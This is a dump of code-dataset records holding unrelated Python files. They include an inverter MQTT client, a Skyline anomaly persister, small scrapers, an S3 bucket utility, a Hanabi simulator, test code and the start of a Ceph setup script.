pv_energy, 0)\r\n client.publish(topic+'/status/scc_voltage', scc_voltage, 0)\r\n client.publish(topic+'/status/batt_discharge', batt_discharge, 0)\r\n client.publish(topic+'/status/load', load, 0)\r\n client.publish(topic+'/status/charging', charging, 0)\r\n client.publish(topic+'/status/charging_status', charging_status, 0)\r\n client.publish(topic+'/status/charging_scc', charging_scc, 0)\r\n client.publish(topic+'/status/charging_grid', charging_grid, 0)\r\n client.publish(topic+'/status/QPIGS_comm', comm_state, 0) \r\n \r\n\r\n# - режим работы инвертора\r\n\r\n mode = 'unknow'\r\n comm_state = 'ok' \r\n\r\n reply = comm_inverter(QMOD)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length) \r\n if crc_ok and length == 5 :\r\n try: \r\n if data == '(P' : mode = 'Pover On mode'\r\n if data == '(S' : mode = 'Standby mode'\r\n if data == '(L' : mode = 'Line mode'\r\n if data == '(B' : mode = 'Battery mode'\r\n if data == '(F' : mode = 'Fault mode'\r\n if data == '(H' : mode = 'Pover saving mode' \r\n except: \r\n comm_state = 'decryption error'\r\n else:\r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n\r\n print('QMOD : ', comm_state)\r\n \r\n client.publish(topic+'/mode/mode', mode , 0)\r\n client.publish(topic+'/mode/QMOD_comm', comm_state , 0)\r\n\r\n# - состояние инвертора\r\n\r\n source_range = 'unknow'\r\n source_priority = 'unknow'\r\n charger_priority = 'unknow'\r\n batt_recharge_voltage = 0.0\r\n batt_under_voltage = 0.0\r\n batt_redischarge_voltage = 0.0\r\n comm_state = 'ok'\r\n \r\n reply = comm_inverter(QPIRI)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length)\r\n if crc_ok and length == 98 :\r\n try:\r\n if data[72] == '0' : source_range = 'APP'\r\n if data[72] == '1' : source_range = 'UPS' \r\n \r\n if data[74] == '0' : source_priority = 'UTI'\r\n if data[74] == '1' : source_priority = 'SOL'\r\n if data[74] == '2' : source_priority = 'SBU' \r\n \r\n if data[76] == '0' : charger_priority = 'UTI'\r\n if data[76] == '1' : charger_priority = 'SOL'\r\n if data[76] == '2' : charger_priority = 'SOL+UTI'\r\n if data[76] == '3' : charger_priority = 'OnlySOL' \r\n \r\n \r\n batt_recharge_voltage = float(data[43:47].replace(',', '.'))\r\n batt_under_voltage = float(data[48:52].replace(',', '.'))\r\n batt_redischarge_voltage = float(data[87:91].replace(',', '.'))\r\n info_rd = True\r\n except: \r\n comm_state = 'decryption error' \r\n else:\r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n \r\n print('QPIRI : ', comm_state)\r\n\r\n client.publish(topic+'/info/source_range', source_range , 0)\r\n client.publish(topic+'/info/source_priority', source_priority , 0)\r\n client.publish(topic+'/info/charger_priority', charger_priority , 0)\r\n client.publish(topic+'/info/batt_recharge_voltage', batt_recharge_voltage , 0)\r\n client.publish(topic+'/info/batt_under_voltage', batt_under_voltage , 0)\r\n client.publish(topic+'/info/batt_redischarge_voltage', batt_redischarge_voltage , 0)\r\n client.publish(topic+'/info/QPIRI_comm', comm_state, 0)\r\n \r\n\r\n# - ошибки и неисправности инвертора\r\n \r\n alarm_1 = 'none'\r\n alarm_2 = 'none'\r\n alarm_3 = 'none'\r\n alarm_4 = 'none'\r\n alarm_5 = 'none'\r\n alarm_6 = 'none'\r\n alarm_7 = 'none'\r\n alarm_8 = 'none'\r\n alarm_9 = 'none'\r\n alarm_10 = 'none'\r\n alarm_11 = 'none'\r\n alarm_12 = 'none'\r\n alarm_13 = 'none'\r\n alarm_14 = 'none'\r\n alarm_15 = 'none'\r\n alarm_16 = 'none'\r\n alarm_17 = 'none'\r\n alarm_18 = 'none'\r\n alarm_19 = 'none'\r\n alarm_20 = 'none'\r\n alarm_21 = 'none'\r\n alarm_22 = 'none'\r\n alarm_23 = 'none'\r\n alarm_24 = 'none'\r\n alarm_25 = 'none'\r\n alarm_26 = 'none'\r\n alarm_27 = 'none'\r\n alarm_28 = 'none'\r\n alarm_29 = 'none'\r\n alarm_30 = 'none'\r\n alarm_31 = 'none'\r\n alarm_32 = 'none' \r\n comm_state = 'ok'\r\n \r\n reply = comm_inverter(QPIWS)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length)\r\n if crc_ok and length == 36 :\r\n alarm = 'Warning'\r\n try:\r\n if data[1] == '1' : alarm_1 = 'Fault'\r\n if data[2] == '1' : alarm_2 = 'Fault'; alarm = 'Fault'\r\n if data[3] == '1' : alarm_3 = 'Fault'\r\n if data[4] == '1' : alarm_4 = 'Fault'\r\n if data[5] == '1' : alarm_5 = 'Fault'\r\n if data[6] == '1' : alarm_6 = 'Fault'\r\n if data[7] == '1' : alarm_7 = 'Fault'\r\n if data[8] == '1' : alarm_8 = 'Fault'\r\n if data[9] == '1' : alarm_9 = 'Fault'\r\n if data[10] == '1' : alarm_10 = alarm\r\n if data[11] == '1' : alarm_11 = alarm\r\n if data[12] == '1' : alarm_12 = alarm \r\n if data[13] == '1' : alarm_13 = 'Warning'\r\n if data[14] == '1' : alarm_14 = 'Fault'\r\n if data[15] == '1' : alarm_15 = 'Warning'\r\n if data[16] == '1' : alarm_16 = 'Fault'\r\n if data[17] == '1' : alarm_17 = alarm\r\n if data[18] == '1' : alarm_18 = 'Fault'\r\n if data[19] == '1' : alarm_19 = 'Fault'\r\n if data[20] == '1' : alarm_20 = 'Fault'\r\n if data[21] == '1' : alarm_21 = 'Fault'\r\n if data[22] == '1' : alarm_22 = 'Fault'\r\n if data[23] == '1' : alarm_23 = 'Fault'\r\n if data[24] == '1' : alarm_24 = 'Fault'\r\n if data[25] == '1' : alarm_25 = 'Fault'\r\n if data[26] == '1' : alarm_26 = 'Warning'\r\n if data[27] == '1' : alarm_27 = 'Warning'\r\n \r\n if data[29] == '1' : alarm_28 = 'Warning'\r\n if data[28] == '1' : alarm_28 = 'Fault'\r\n \r\n if data[30] == '1' : alarm_30 = 'Warning'\r\n if data[31] == '1' : alarm_31 = 'Fault'\r\n if data[32] == '1' : alarm_32 = 'Fault' \r\n except: \r\n comm_state = 'decryption error' \r\n else:\r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n\r\n print('QPIWS : ', comm_state) \r\n\r\n #client.publish(topic+'/alarm/alarm_1', alarm_1, 0)\r\n client.publish(topic+'/alarm/inverter', alarm_2, 0)\r\n client.publish(topic+'/alarm/bus_over', alarm_3, 0)\r\n client.publish(topic+'/alarm/bus_under', alarm_4, 0)\r\n client.publish(topic+'/alarm/bus_soft_fail', alarm_5, 0)\r\n client.publish(topic+'/alarm/line_fail', alarm_6, 0)\r\n client.publish(topic+'/alarm/opv_short', alarm_7, 0)\r\n client.publish(topic+'/alarm/inverter_voltage_too_low', alarm_8, 0)\r\n client.publish(topic+'/alarm/inverter_voltage_too_high', alarm_9, 0)\r\n client.publish(topic+'/alarm/over_temperature', alarm_10, 0)\r\n client.publish(topic+'/alarm/fan_locked', alarm_11, 0)\r\n client.publish(topic+'/alarm/battery_voltage_high', alarm_12, 0) \r\n client.publish(topic+'/alarm/battery_low', alarm_13, 0)\r\n #client.publish(topic+'/alarm/alarm_14', alarm_14, 0)\r\n client.publish(topic+'/alarm/battery_under_shutdown', alarm_15, 0)\r\n #client.publish(topic+'/alarm/alarm_16', alarm_16, 0)\r\n client.publish(topic+'/alarm/over_load', alarm_17, 0)\r\n client.publish(topic+'/alarm/eeprom fault', alarm_18, 0)\r\n client.publish(topic+'/alarm/inverter_over_current', alarm_19, 0)\r\n client.publish(topic+'/alarm/inverter_soft_fail', alarm_20, 0)\r\n client.publish(topic+'/alarm/self_test_fail', alarm_21, 0)\r\n client.publish(topic+'/alarm/op_dc_voltage_over', alarm_22, 0) \r\n client.publish(topic+'/alarm/bat_open', alarm_23, 0)\r\n client.publish(topic+'/alarm/current_sensor_fail', alarm_24, 0)\r\n client.publish(topic+'/alarm/battery_short', alarm_25, 0)\r\n client.publish(topic+'/alarm/power_limit', alarm_26, 0)\r\n client.publish(topic+'/alarm/pv_voltage_high', alarm_27, 0)\r\n client.publish(topic+'/alarm/mppt_overload', alarm_28, 0)\r\n \r\n client.publish(topic+'/alarm/battery_too_low_to_charge', alarm_30, 0)\r\n #client.publish(topic+'/alarm/alarm_31', alarm_31, 0)\r\n #client.publish(topic+'/alarm/alarm_32', alarm_32, 0) \r\n client.publish(topic+'/alarm/QPIWS_comm', comm_state, 0)\r\n","sub_path":"solar_mqtt_client.py","file_name":"solar_mqtt_client.py","file_ext":"py","file_size_in_byte":39422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"428692223","text":"# import pygame module\nimport pygame\n\n\ndef main():\n # this is the main function that is called upon program execution\n\n # init pygame module\n pygame.init()\n # load and set task bar logo\n logo = pygame.image.load(\"logo256x256.png\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Space Company\")\n\n # create the set_mode surface\n screen = pygame.display.set_mode((1366, 768))\n screen.fill((255, 179, 0))\n\n # main menu function call\n main_menu(screen)\n\n # define a variable to control the main loop\n running = True\n\n # main loop\n while running:\n # event handling, gets all event from event queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.QUIT:\n # change running to False to exit main loop\n running = False\n\n\ndef main_menu(screen):\n\n # main menu bg + title\n main_menu_bg = pygame.image.load(\"bg.png\")\n main_menu_title = pygame.image.load(\"title.png\")\n screen.blit(main_menu_bg, (0, 0))\n screen.blit(main_menu_title, (50, 50))\n\n # blit an image\n image = pygame.image.load(\"konoRegret.png\")\n screen.blit(image, (600, 300))\n pygame.display.flip()\n\n # text buttons\n\n\n\n# run the main function only if this module is executed as the main script\n# (if you import this as a module then nothing is executed.)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"SpaceCompany.py","file_name":"SpaceCompany.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"257939076","text":"from threading import Thread\nfrom redis import StrictRedis\nfrom os import kill\nfrom time import sleep, time\nfrom multiprocessing import Process\nfrom math import ceil\nfrom msgpack import Unpacker\nimport pymysql\n\nimport logging\nimport settings\n\nlogger = logging.getLogger(\"AnalyzerLog\")\n\n\nclass Persister(Thread):\n \"\"\"\n The Persister is responsible for saving anomaly data points to mysql database.\n \"\"\"\n def __init__(self, parent_pid):\n super(Persister, self).__init__()\n self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)\n self.mysql_conn = pymysql.connect(host=settings.MYSQL_HOST, port=settings.MYSQL_PORT, user=settings.MYSQL_USER,\n password=settings.MYSQL_PASSWORD, db=settings.MYSQL_DB, charset=settings.MYSQL_CHARSET)\n self.parent_pid = parent_pid\n\n def check_if_parent_is_alive(self):\n \"\"\"\n Self explanatory.\n \"\"\"\n try:\n kill(self.parent_pid, 0)\n except:\n exit(0)\n\n def do_persist(self, index, anomaly_unique_metrics):\n \"\"\"\n Assign a bunch of anomaly metrics for a process to persist.\n \"\"\"\n # Discover assigned metrics\n keys_per_processor = int(ceil(float(len(anomaly_unique_metrics)) / float(settings.PERSIST_PROCESSES)))\n if index == settings.PERSIST_PROCESSES:\n assigned_max = len(anomaly_unique_metrics)\n else:\n assigned_max = index * keys_per_processor\n assigned_min = assigned_max - keys_per_processor\n assigned_keys = range(assigned_min, assigned_max)\n\n # Compile assigned metrics\n assigned_metrics = [anomaly_unique_metrics[index] for index in assigned_keys]\n\n # Check if this process is unnecessary\n if len(assigned_metrics) == 0:\n return\n\n # Multi get series\n pipe = self.redis_conn.pipeline()\n pipe.multi()\n pipe.mget(assigned_metrics)\n for i, metric_name in enumerate(assigned_metrics):\n pipe.delete(metric_name)\n raw_assigned = pipe.execute()[0]\n\n # Distill timeseries strings into lists\n # store abnormal data point to mysql database\n cursor = self.mysql_conn.cursor()\n sql = 'INSERT into t_abnormal(time,data) VALUES (%s,%s);'\n for i, metric_name in enumerate(assigned_metrics):\n self.check_if_parent_is_alive()\n\n raw_series = raw_assigned[i]\n unpacker = Unpacker(use_list=False)\n unpacker.feed(raw_series)\n timeseries = list(unpacker)\n\n for j, datapoint in enumerate(timeseries):\n cursor.execute(sql, [str(datapoint[0]), str(datapoint)])\n self.mysql_conn.commit()\n cursor.close()\n\n def run(self):\n \"\"\"\n Called when process initializes.\n \"\"\"\n logger.info('started persister')\n\n while(1):\n\n now = time()\n\n # Make sure Redis is up\n try:\n self.redis_conn.ping()\n except:\n logger.error('skyline can\\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)\n sleep(10)\n self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)\n continue\n\n # Discover anomaly metrics\n anomaly_unique_metrics = list(self.redis_conn.smembers(settings.ANOMALY_NAMESPACE + 'unique_metrics'))\n if len(anomaly_unique_metrics) == 0:\n logger.info('No anomaly metrics in redis. Everything is fine.')\n sleep(60)\n continue\n\n # Spawn processes\n pids = []\n for i in range(1, settings.PERSIST_PROCESSES + 1):\n if i > len(anomaly_unique_metrics):\n logger.warning('WARNING: skyline is set for more cores than needed.')\n break\n\n p = Process(target=self.do_persist, args=(i, anomaly_unique_metrics))\n pids.append(p)\n p.start()\n\n # Send wait signal to zombie processes\n for p in pids:\n p.join()\n\n # Sleep if it went too fast\n if time() - now < 5:\n logger.info('persister sleeping due to low run time...')\n sleep(20)\n","sub_path":"src/analyzer/persister.py","file_name":"persister.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"232577115","text":"import re, sys, os\nfrom collections import defaultdict, Counter, deque\nfrom pprint import pprint\nfrom copy import deepcopy\nfrom itertools import count\n#from dateutil.parser import parse\n\n\nwith open('input', 'rt') as f:\n nums = [int(v) for v in f.read().strip().split(',')]\n\n\nsaid = {n: [i] for i, n in enumerate(nums)}\n\nlast = nums[-1]\n\ni = len(nums)\n\nwhile i < 2020:\n prev_said = said[last]\n if len(prev_said) == 1:\n curr = 0\n else:\n curr = i - prev_said[-2] - 1\n last = curr\n if curr in said:\n said[curr].append(i)\n else:\n said[curr] = [i]\n i += 1\n\n\nprint(last)\n\n","sub_path":"day15/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"90322284","text":"# !/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\n\nimport requests\n\n\n# 发送带参数的请求\n\nclass Baidu_Spider(object):\n def __init__(self):\n # 第二种 传递参数 url 去掉了 wd=\n self.url = 'https://www.baidu.com/s?'\n self.search_content = input('请输入您要搜索的内容:')\n self.headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\"}\n\n # 1.发送请求\n def send_request(self, url, params):\n response = requests.get(url, headers=self.headers, params=params)\n return response.content.decode()\n\n # 2.写入文件保存\n def write_file(self, data):\n with open('05params.html', 'w') as f:\n f.write(data)\n print('保存成功!')\n\n # 3. 调度\n def run(self):\n # 1.根据用户输入的内容 拼接 参数\n params = {\n \"wd\": self.search_content\n }\n\n # 2.发送请求\n data = self.send_request(self.url, params=params)\n # 3.保存数据\n self.write_file(data)\n\n\nif __name__ == '__main__':\n tool = Baidu_Spider()\n tool.run()\n","sub_path":"scrapy_lian/laoshi01/预习资料/05requestsparams2.py","file_name":"05requestsparams2.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"326147984","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport copy\nimport unittest\nfrom test.generic.config_utils import get_fast_test_task_config\n\nimport torch\nimport torch.nn as nn\nfrom classy_vision.models import ClassyModel\nfrom classy_vision.models.classy_model_wrapper import ClassyModelWrapper\nfrom classy_vision.tasks import build_task\nfrom classy_vision.trainer import LocalTrainer\nfrom torchvision import models\n\n\nclass TestModel(nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = nn.Linear(10, 5)\n\n def forward(self, x):\n return self.linear(x)\n\n def extract_features(self, x):\n return torch.cat([x, x], dim=1)\n\n\nclass TestClassyModelWrapper(unittest.TestCase):\n def test_classy_model_wrapper(self):\n model = TestModel()\n classy_model = ClassyModelWrapper(model)\n # test that the returned object is an instance of ClassyModel\n self.assertIsInstance(classy_model, ClassyModel)\n\n # test that forward works correctly\n input = torch.zeros((100, 10))\n output = classy_model(input)\n self.assertEqual(output.shape, (100, 5))\n\n # test that extract_features works correctly\n input = torch.zeros((100, 10))\n output = classy_model.extract_features(input)\n self.assertEqual(output.shape, (100, 20))\n\n # test that get_classy_state and set_classy_state work\n nn.init.constant_(classy_model.model.linear.weight, 1)\n weights = copy.deepcopy(classy_model.model.linear.weight.data)\n state_dict = classy_model.get_classy_state(deep_copy=True)\n nn.init.constant_(classy_model.model.linear.weight, 0)\n classy_model.set_classy_state(state_dict)\n self.assertTrue(torch.allclose(weights, classy_model.model.linear.weight.data))\n\n def test_classy_model_wrapper_properties(self):\n # test that the properties work correctly when passed to the wrapper\n model = TestModel()\n num_classes = 5\n input_shape = (10,)\n output_shape = (num_classes,)\n model_depth = 1\n classy_model = ClassyModelWrapper(\n model,\n input_shape=input_shape,\n output_shape=output_shape,\n model_depth=model_depth,\n )\n self.assertEqual(classy_model.input_shape, input_shape)\n self.assertEqual(classy_model.output_shape, output_shape)\n self.assertEqual(classy_model.model_depth, model_depth)\n\n def test_train_step(self):\n # test that the model can be run in a train step\n model = models.resnet34(pretrained=False)\n classy_model = ClassyModelWrapper(model)\n\n config = get_fast_test_task_config()\n task = build_task(config)\n task.set_model(classy_model)\n trainer = LocalTrainer()\n trainer.train(task)\n","sub_path":"test/models_classy_model_wrapper_test.py","file_name":"models_classy_model_wrapper_test.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"113348424","text":"# Ask 1\r\n\r\nimport codecs\r\nimport os\r\n\r\n# checking if the file name is valid and can be read\r\nwhile True:\r\n f1 = input(\"Give the name of the file: \")\r\n if os.access(f1, os.R_OK):\r\n break\r\nfile = codecs.open(f1, \"r\", encoding='utf-8')\r\nwordlist = []\r\nword = \"\"\r\n\r\n# importing the words into a list\r\nfor letter in file.read():\r\n if letter.isalpha():\r\n word += letter\r\n elif letter in \"0123456789\":\r\n word = \"\"\r\n else:\r\n wordlist.append(word)\r\n word = \"\"\r\nfile.close()\r\n\r\n# list sorting\r\nword = \"\"\r\nfor i in range(len(wordlist)-1):\r\n for j in range(len(wordlist)-1, i-1, -1):\r\n if len(wordlist[j]) > len(wordlist[j-1]):\r\n wordlist[j],wordlist[j-1] = wordlist[j-1],wordlist[j]\r\n\r\n# removing the smaller words\r\nfor i in range(len(wordlist)):\r\n if i>=5:\r\n wordlist[i] = \"\"\r\n\r\n# list reversing\r\nfor i in range(len(wordlist)-1):\r\n for j in wordlist[i]:\r\n word = j + word\r\n wordlist[i] = word\r\n word = \"\"\r\n\r\n# removing vowels from list items\r\nword = \"\"\r\nfor i in range(len(wordlist)-1):\r\n for j in wordlist[i]:\r\n if j in \"aeyuioAEYUIO\":\r\n word += \"\"\r\n elif j in \"αεηιυοωάέήίύόώΑΕΗΙΥΟΩΆΈΉΊΎΌΏ\":\r\n word += \"\"\r\n else:\r\n word += j\r\n wordlist[i] = word\r\n word = \"\"\r\n\r\n# printing the 5 biggest words reversed with the vowels removed\r\nif len(wordlist) >= 5:\r\n for i in range(5):\r\n print(wordlist[i])\r\nelse:\r\n for i in wordlist:\r\n print(i)","sub_path":"code1.py","file_name":"code1.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9451417","text":"import sys\nimport boto3\nimport json\nimport botocore\nimport argparse\n\n# define the function blocks for diff S3 bucket operations\ndef bucket_exists():\n if bucket_name.creation_date:\n print('bucket exists')\n return True \n else:\n print('bucket does not exist')\n return False\n#Empties contents of bucket\ndef delete_bucket():\n bucket_name.objects.all().delete()\n bucket_name.delete()\n\n#Force deletes bucket and its contents\ndef empty_bucket():\n bucket_name.objects.all().delete()\n\n#Check for file/folder/key within bucket\ndef check_key():\n objs = list(bucket_name.objects.filter(Prefix=key))\n if len(objs) > 0 and objs[0].key == key:\n return True\n else:\n return False\n#Print contents of bucket to file & return filepath\ndef read_keyfile():\n if check_key:\n return s3.Object(sys.argv[2],key).get()['Body'].read()\n else:\n return None\n\n#Prints out all file.folder contents in a bucket\ndef bucket_contents():\n for object in bucket_name.objects.all():\n print(object)\n\nif __name__ == '__main__':\n\n c2 = boto3.resource('ec2')\n s3 = boto3.resource('s3')\n parser = argparse.ArgumentParser(description='Perform various operations on a specific S3 bucket')\n parser.add_argument('-o', dest='operation', required=True, help='Operation you want performed on a specific S3 bucket')\n parser.add_argument('-b', dest='bucket', required=True, help='Name of the S3 bucket')\n parser.add_argument('-f', dest='key', required=False, default=None, help='Full path of file/folder/key in S3 bucket')\n \n args = parser.parse_args()\n\n s3_operation = args.operation\n bucket_name = s3.Bucket(args.bucket)\n key = args.key\n\n# map the inputs to the function blocks\n options = {'a' : bucket_exists,\n 'b' : check_key,\n 'c' : empty_bucket,\n 'd' : delete_bucket,\n 'f' : read_keyfile,\n 'g' : bucket_contents,\n 'h' : read_keyfile,\n }\n\n options[s3_operation]()\n","sub_path":"tools/aws/s3_monitor.py","file_name":"s3_monitor.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357312741","text":"# a player has 5 cards, the left most card is to throw away, the right most card is the new one\n# a player has 'information' which is the last hint received as ['type', 'value', 'cards'] e.g. [1,4]\n\nfrom setup import start_situation\nfrom game_functions import discard, next_player, determine_hint, discard_risk, play_card\n\n# input variables\nnumber_of_players = 2\ninclude_multi = False\n\n# initialize variables\ndiscard_pile = [] # initialize the discard place to track discarded cards\nhint_chips = 8 # start with 8 hint_chips\nerror_chips = 0 # start with 0 error chips\ncurrent_player = 0 # start with first player\n\n# start_situation(number_of_players [2-5], include_multicolor [True/False])\nsituation, deck, cards_on_table, cards_needed = start_situation(number_of_players, include_multi)\n\n\n# start the game\n\ndef take_turn(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips):\n # 1. check if last card next player is issue [add later]\n\n # 2. check if you can play a card\n card_info = situation[current_player]['information']\n if card_info:\n print(\"card to play: \" + str(card_info))\n play_card(deck, situation, current_player, discard_pile, cards_needed, cards_on_table, error_chips)\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n # 3. can you give a hint\n hint = determine_hint(situation, current_player, hint_chips, cards_needed)\n print(hint)\n if hint:\n print(\"give hint: \" + str(hint))\n\n # give that hint\n situation[next_player(current_player, number_of_players)]['information'] = [hint]\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n # 4. discard\n if hint_chips < 8:\n print(\"discard\")\n situation, deck, discard_pile, hint_chips = discard(situation, current_player, deck, discard_pile, hint_chips)\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n print(\"turn wasted\")\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n\ndef play_game(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips):\n while deck:\n situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips = take_turn(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips)\n current_player = next_player(current_player, number_of_players)\n\n if error_chips > 3:\n print(\"too many errors\")\n return\n\n# play_game(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips)\n\nfor i in range(30):\n\n for j in situation:\n print(j)\n\n situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips = take_turn(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips)\n current_player = next_player(current_player, number_of_players)\n print('..........')\n\nprint(cards_needed)\n\n# current_player = next_player(current_player, number_of_players)\n# situation, deck, discard_pile, hint_chips = discard(situation, current_player, deck, discard_pile, hint_chips)\n","sub_path":"play_hanabi.py","file_name":"play_hanabi.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241761467","text":"import inspect\nimport os.path\n\n\nclass BuildSystemException(Exception):\n def __init__(self, text, exit_code=None, frame=1):\n if exit_code is None:\n frame_info = inspect.stack()[frame]\n msg = '[{}({})] {}'.format(os.path.basename(frame_info[1]), frame_info[2], text)\n else:\n msg = text\n Exception.__init__(self, msg)\n self.exit_code = 126\n if exit_code is not None:\n self.exit_code = exit_code\n\n def to_exit_code(self):\n return self.exit_code\n\nclass BuildSystemPureVirtualCall(BuildSystemException):\n def __init__(self, class_instance):\n frame_info = inspect.stack()[1]\n BuildSystemException.__init__(self, \"Pure virtual call - {}::{}\".format(type(class_instance).__name__, frame_info[3]), frame=3)","sub_path":"pylibs/minibuild/error_utils.py","file_name":"error_utils.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"146825250","text":"# -*- coding: utf-8 -*-\n\"\"\"a function of ploting figures.\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef cross_validation_visualization(param, rmse_tr, rmse_te, param_type):\n \"\"\"visualization the curves of rmse_tr and rmse_te.\"\"\"\n \n #Param type can be: degree, gamma, lambda\n \n plt.semilogx(param, rmse_tr, marker=\".\", color='b', label='train error')\n plt.semilogx(param, rmse_te, marker=\".\", color='r', label='test error')\n plt.xlabel(param_type)\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross validation for \" + param_type)\n\n\n\ndef cross_validation_jets(param, rmse_te_list, param_type):\n \n colours = ['b','r','g','m']\n jets = np.arange(4)\n \n for (rmse_te, col, jet_num) in zip(rmse_te_list, colours, jets):\n txt = 'test error' + jet_num\n plt.semilogx(param, rmse_te, marker=\".\", color= col, label=txt)\n \n plt.xlabel(param_type)\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n \n plt.savefig(\"cross validation all jets 1 method for \" + param_type)\n\n\ndef plot_variance(rmse_te, param):\n fig, ax1 = plt.subplots()\n title = 'RMSE test data versus ' + param\n ax1.set_title(title)\n ax1.boxplot(rmse_te.T)","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"430879837","text":"import urllib2\nimport chardet\n\ncitiesDict = {} #pinyin:char\n\n#Grabs html off Baixing of cities page\ndef getCitiesHTML():\n\turl = \"http://baixing.com/?changeLocation=yes\"\n\thtml = urllib2.urlopen(url)\n\tmyFile = open(\"Baixing_citySourceCode.txt\", \"w\")\n\tfor line in html:\n\t\tmyFile.write(line)\n\tmyFile.close\n\n#Finds just the city names (pinyin and char), writes to Parsed_Cities.txt\ndef parseCitiesWhile():\n\tglobal citiesDict\n\t# Parse source code file to get content\n\tcontent = \"\"\n\tmyFile = open(\"Baixing_citySourceCode.txt\", \"r\")\n\tfor line in myFile:\n\t\tcontent += line\n\tmyFile.close()\n\n\t# Cut content to only include table containing cities\n\tbegin = content.find(\"new_cities\")\n\tend = content.find(\"</tr></table></table>\") # end of cities table\n\tcontent = content[begin:end]\n\n\tparsedCitiesFile = open('Parsed_Cities.txt', \"w\")\n\n\t# While loop to add cities pinyin and char to citiesDict\n\twhile (len(content) > 0):\n\t\tpinStart = content.find(\"://\")\n\t\tif (pinStart == -1):\n\t\t\tcontent = \"\"\n\t\telse:\n\t\t\tpinEnd = content.find(\".\")\n\t\t\tpinCity = content[pinStart + 3:pinEnd]\n\n\t\t\tcharStart = pinEnd + 15\n\t\t\tcharEnd = content.find(\"</a>\")\n\t\t\tcharCity = unicode(content[charStart:charEnd], \"utf-8\")\n\n\t\t\tcitiesDict[pinCity] = charCity\n\t\t\tparsedCitiesFile.write(pinCity + \":\" + charCity.encode(\"utf-8\") + \"\\n\")\n\t\t\tcontent = content[charEnd + 4:]\n\n\tparsedCitiesFile.close()\n","sub_path":"KNserver/jiebaWeb/updatedCities.py","file_name":"updatedCities.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"225146204","text":"import pickle\nimport re\n\nfrom docopt import docopt\nfrom utils.configs import (\n get_configs,\n get_packages,\n get_registry_credentials,\n get_repos,\n get_subscription_credentials,\n)\nfrom utils.configure import setup_ssh_keys\n\nfrom cli.exceptions import NodeConfigError\nfrom cli.utilities.containers import Registry\nfrom cli.utilities.packages import Package\nfrom cli.utilities.packages import SubscriptionManager as sm\nfrom cli.utilities.packages import SubscriptionManagerError\nfrom cli.utilities.utils import os_major_version\nfrom cli.utilities.waiter import WaitUntil\nfrom utility.log import Log\n\nlog = Log(__name__)\n\ndoc = \"\"\"\nUtility to configure prerequisites for deployed cluster\n Usage:\n 